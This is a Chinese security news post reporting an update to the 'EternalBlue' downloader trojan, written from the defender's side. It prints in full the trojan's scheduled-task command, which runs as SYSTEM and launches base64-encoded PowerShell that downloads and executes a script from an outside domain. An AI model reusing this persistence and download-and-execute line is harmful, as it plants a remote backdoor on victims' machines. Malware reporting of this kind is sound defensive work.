您的位置 首页 > 数码极客

【木马病毒下载】警报!“永恒之蓝”下载器木马再度更新!

不久前,360安全大脑警告了《驱动人生传播永恒之蓝下载器木马》,今天上午“永恒之蓝”下载机木马再次更新。

此次更新通过服务器调整云控指令,实现对木马下载模块的更新,这也体现出了此类下载器木马的灵活性—可随时更新木马组件。下图是新的攻击模块下载地址:



这次更新的文件为之前的“永恒之蓝”漏洞攻击组件,保留了之前永恒之蓝漏洞攻击的模块,新增加一个powershell后门,同时更新了木马程序落地的名称。

其中powershell的后门通过注册一个计划任务实现:

命令行:C:\WINDOWS\system32\cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:05:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcgAuAG0AaQBuAGkAYwBlAG4ALgBnAGEALwByAD8AcAAnACkA" /F

解码之后,利用powershell执行这一段脚本:'hxx;

目前看,这个域名刚刚注册,还没有做解析,后续可以通过这段脚本,长期驻留用户计算机,下发攻击脚本。



使用360安全卫士的用户无须担心,360安全卫士可拦截和查杀此类木马和后门。



关于作者: admin

无忧经验小编鲁达,内容侵删请Email至wohenlihai#qq.com(#改为@)

热门推荐